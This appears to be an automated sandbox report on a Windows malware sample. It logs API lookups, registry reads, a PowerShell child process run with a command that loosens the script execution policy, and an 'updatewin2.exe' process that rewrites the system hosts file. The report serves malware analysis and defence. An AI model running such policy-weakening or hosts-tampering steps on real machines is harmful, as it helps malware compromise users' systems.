Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileA, address_out = 0x76c353c6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessA, address_out = 0x76c31072 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyW, address_out = 0x76c53102 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateProcessW, address_out = 0x76c3103d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WaitForSingleObject, address_out = 0x76c31136 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrlenA, address_out = 0x76c35a4b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WideCharToMultiByte, address_out = 0x76c3170d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = MultiByteToWideChar, address_out = 0x76c3192e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineW, address_out = 0x76c35223 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteFileA, address_out = 0x76c35444 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcatA, address_out = 0x76c52b7a True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = lstrcpyA, address_out = 0x76c52a9d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentVariableA, address_out = 0x76c333a0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetShortPathNameA, address_out = 0x76c5594d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameA, address_out = 0x76c314b1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCommandLineA, address_out = 0x76c351a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCPInfo, address_out = 0x76c35189 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetOEMCP, address_out = 0x76c5d1a1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsValidCodePage, address_out = 0x76c34493 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DeleteCriticalSection, address_out = 0x771645f5 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionAndSpinCount, address_out = 0x76c31916 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsAlloc, address_out = 0x76c349ad True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsGetValue, address_out = 0x76c311e0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsSetValue, address_out = 0x76c314fb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TlsFree, address_out = 0x76c33587 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeLibrary, address_out = 0x76c334c8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcAddress, address_out = 0x76c31222 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LoadLibraryExW, address_out = 0x76c3495d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStdHandle, address_out = 0x76c351b3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleFileNameW, address_out = 0x76c34950 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleExW, address_out = 0x76c34a6f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetACP, address_out = 0x76c3179c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapAlloc, address_out = 0x7715e026 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapFree, address_out = 0x76c314c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindClose, address_out = 0x76c34442 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindFirstFileExW, address_out = 0x76c41811 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FindNextFileW, address_out = 0x76c354ee True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegOpenKeyExW, address_out = 0x74d5468d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCloseKey, address_out = 0x74d5469d True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegCreateKeyExW, address_out = 0x74d540fe True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = SetSecurityDescriptorDacl, address_out = 0x74d5415e True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = InitializeSecurityDescriptor, address_out = 0x74d54620 True 1
Fn
Get Address c:\windows\syswow64\advapi32.dll function = RegSetValueExW, address_out = 0x74d514d6 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = ShellExecuteExW, address_out = 0x75ff1e46 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = SHGetFolderPathW, address_out = 0x76055708 True 1
Fn
Get Address c:\windows\syswow64\shell32.dll function = CommandLineToArgvW, address_out = 0x75fe9ee8 True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathAppendW, address_out = 0x753581ef True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathFileExistsA, address_out = 0x7537ad1a True 1
Fn
Get Address c:\windows\syswow64\shlwapi.dll function = PathRemoveFileSpecW, address_out = 0x75353248 True 1
Fn
Get Address c:\windows\syswow64\msvcr100.dll function = atexit, address_out = 0x7491c544 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeCriticalSectionEx, address_out = 0x76c34d28 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringEx, address_out = 0x76cb47f1 True 1
Fn
System (256)
»
Operation Additional Information Success Count Logfile
Get Time type = System Time, time = 2019-07-19 06:57:38 (UTC) True 2
Fn
Get Time type = Ticks, time = 114520 True 1
Fn
Get Time type = Performance Ctr, time = 17250411335 True 1
Fn
Get Time type = Ticks, time = 114567 True 1
Fn
Get Time type = System Time True 249
Fn
Get Time type = Performance Ctr, time = 17274821524 True 1
Fn
Get Info type = Operating System True 1
Fn
Environment (2)
»
Operation Additional Information Success Count Logfile
Get Environment String - True 2
Fn
Data
Process #8: powershell.exe
155 0
»
Information Value
ID #8
File Name c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
Command Line powershell -Command Set-ExecutionPolicy -Scope CurrentUser RemoteSigned
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:01:05, Reason: Self Terminated
Monitor Duration 00:00:12
OS Process Information
»
Information Value
PID 0xa24
Parent PID 0xa1c (c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin1.exe)
Bitness 32-bit
Is Created or Modified Executable False
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A28
0x A3C
0x A48
0x A4C
0x A50
0x A54
0x A58
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C22D60, 0x73C24248, ... False False
powershell.exe 0x21C90000 0x21D01FFF Relevant Image - 32-bit - False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C69A98 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C23950 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C54AA0, 0x73C23AE8 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C55BC0 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C561C4 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C5F3AC False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C60220 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C64378 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C63C14 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C503B8 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C51000 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C62E94 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C61910 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C53B80 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C4D828 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C4E000 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C4FAF0 False False
microsoft.powershell.consolehost.ni.dll 0x73C10000 0x73C90FFF Content Changed - 32-bit 0x73C57380 False False
Host Behavior
File (65)
»
Operation Filename Additional Information Success Count Logfile
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create CONOUT$ desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Create C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.config type = file_attributes False 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0 type = file_attributes True 1
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_attributes True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml type = file_type True 2
Fn
Get Info C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml type = file_type True 2
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 4096 True 3
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 3315 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 781, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\GetEvent.types.ps1xml size = 4096, size_out = 0 True 1
Fn
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 4096 True 41
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 436 True 1
Fn
Data
Read C:\Windows\SysWOW64\WindowsPowerShell\v1.0\types.ps1xml size = 4096, size_out = 0 True 1
Fn
Registry (20)
»
Operation Key Additional Information Success Count Logfile
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment - True 1
Fn
Open Key HKEY_CURRENT_USER\Environment - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\SysWOW64\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Module (1)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\syswow64\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
User (1)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
System (6)
»
Operation Additional Information Success Count Logfile
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Info type = Hardware Information True 1
Fn
Environment (27)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 25
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\5p5NrGJn0jS HALPmcxz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Process #9: updatewin2.exe
654 0
»
Information Value
ID #9
File Name c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe
Command Line "C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe"
Initial Working Directory C:\Users\5p5NrGJn0jS HALPmcxz\Desktop\
Monitor Start Time: 00:00:52, Reason: Child Process
Unmonitor End Time: 00:00:54, Reason: Self Terminated
Monitor Duration 00:00:01
OS Process Information
»
Information Value
PID 0xa40
Parent PID 0x9a4 (c:\users\5p5nrgjn0js halpmcxz\desktop\ls_appdata744de46e-2913-4f69-a0ea-d12dff2a5c90sample.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username XDUWTFONO\5p5NrGJn0jS HALPmcxz
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x A44
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
updatewin2.exe 0x00400000 0x0044CFFF Relevant Image - 32-bit - False False
buffer 0x00305000 0x00305FFF Marked Executable - 32-bit - False False
updatewin2.exe 0x00400000 0x0044CFFF Process Termination - 32-bit - False False
Modified Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows\System32\drivers\etc\hosts 7.92 KB MD5: 360d265eddea8679c434a205f7ade7ad
SHA1: e17d843f610e0283904e201195360525ae449a68
SHA256: 5a1597c0d29dd475e33cd8889d7d848037a8c17bad0f3daa022fb889e0db7ead
SSDeep: 96:vDZEurK9q3WlSyU0FXmGZll0TOHyF9fAHLmttA/ZKTKdIlMHqzoCGbXx:RrK9FU0FXmGZll06m9fAH6AhKTK9Cax
False
Host Behavior
File (9)
»
Operation Filename Additional Information Success Count Logfile
Create C:\Windows\System32\drivers\etc\hosts desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Fn
Get Info C:\Windows\System32\drivers\etc\hosts type = size True 1
Fn
Open STD_INPUT_HANDLE - True 2
Fn
Open STD_OUTPUT_HANDLE - True 2
Fn
Open STD_ERROR_HANDLE - True 2
Fn
Write C:\Windows\System32\drivers\etc\hosts size = 7286 True 1
Fn
Data
Module (135)
»
Operation Module Additional Information Success Count Logfile
Load kernel32.dll base_address = 0x76c20000 True 2
Fn
Load KERNEL32.dll base_address = 0x76c20000 True 1
Fn
Load USER32.dll base_address = 0x74f40000 True 1
Fn
Load SHELL32.dll base_address = 0x75fd0000 True 1
Fn
Load SHLWAPI.dll base_address = 0x75340000 True 1
Fn
Load msvcr100.dll base_address = 0x74900000 True 1
Fn
Load api-ms-win-core-synch-l1-2-0 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x0 False 2
Fn
Load kernel32 base_address = 0x76c20000 True 2
Fn
Load api-ms-win-core-fibers-l1-1-1 base_address = 0x0 False 2
Fn
Load api-ms-win-core-localization-l1-2-1 base_address = 0x0 False 1
Fn
Load api-ms-win-appmodel-runtime-l1-1-2 base_address = 0x0 False 1
Fn
Get Handle c:\windows\syswow64\kernel32.dll base_address = 0x76c20000 True 11
Fn
Get Handle c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe base_address = 0x400000 True 2
Fn
Get Handle mscoree.dll - False 1
Fn
Get Filename - process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe, size = 260 True 1
Fn
Get Filename api-ms-win-core-localization-l1-2-1 process_name = c:\users\5p5nrgjn0js halpmcxz\appdata\local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe, file_name_orig = C:\Users\5p5NrGJn0jS HALPmcxz\AppData\Local\5f157674-79c2-4ded-9dab-75219d8fb8ff\updatewin2.exe, size = 260 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsAlloc, address_out = 0x76c34f2b True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsGetValue, address_out = 0x76c31252 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsSetValue, address_out = 0x76c34208 True 3
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlsFree, address_out = 0x76c3359f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EncodePointer, address_out = 0x77170fcb True 9
Fn
Get Address c:\windows\syswow64\kernel32.dll function = DecodePointer, address_out = 0x77169d35 True 4
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateToolhelp32Snapshot, address_out = 0x76c5735f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = Module32FirstW, address_out = 0x76c579f9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualAlloc, address_out = 0x76c31856 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualProtect, address_out = 0x76c3435f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = VirtualFree, address_out = 0x76c3186e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetVersionExA, address_out = 0x76c33519 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = TerminateProcess, address_out = 0x76c4d802 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = ExitProcess, address_out = 0x76c37a10 True 2
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetErrorMode, address_out = 0x76c31b00 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CreateFileW, address_out = 0x76c33f5c True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileSize, address_out = 0x76c3196e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointer, address_out = 0x76c317d1 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteFile, address_out = 0x76c31282 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = CloseHandle, address_out = 0x76c31410 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = WriteConsoleW, address_out = 0x76c57aca True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetFilePointerEx, address_out = 0x76c4c807 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleMode, address_out = 0x76c31328 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetConsoleCP, address_out = 0x76cd7bff True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FlushFileBuffers, address_out = 0x76c3469b True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapReAlloc, address_out = 0x77171f6e True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = HeapSize, address_out = 0x77163002 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetProcessHeap, address_out = 0x76c314e9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LCMapStringW, address_out = 0x76c317b9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStringTypeW, address_out = 0x76c31946 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetFileType, address_out = 0x76c33531 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetStdHandle, address_out = 0x76cb454f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = FreeEnvironmentStringsW, address_out = 0x76c351cb True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetEnvironmentStringsW, address_out = 0x76c351e3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = UnhandledExceptionFilter, address_out = 0x76c5772f True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetUnhandledExceptionFilter, address_out = 0x76c387c9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcess, address_out = 0x76c31809 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsProcessorFeaturePresent, address_out = 0x76c35235 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = QueryPerformanceCounter, address_out = 0x76c31725 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentProcessId, address_out = 0x76c311f8 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetCurrentThreadId, address_out = 0x76c31450 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetSystemTimeAsFileTime, address_out = 0x76c33509 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = InitializeSListHead, address_out = 0x771694a4 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = IsDebuggerPresent, address_out = 0x76c34a5d True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetStartupInfoW, address_out = 0x76c34d40 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetModuleHandleW, address_out = 0x76c334b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RtlUnwind, address_out = 0x76c5d1c3 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = RaiseException, address_out = 0x76c358a6 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = GetLastError, address_out = 0x76c311c0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = SetLastError, address_out = 0x76c311a9 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = EnterCriticalSection, address_out = 0x771522b0 True 1
Fn
Get Address c:\windows\syswow64\kernel32.dll function = LeaveCriticalSection, address_out = 0x77152270 True 1
Fn
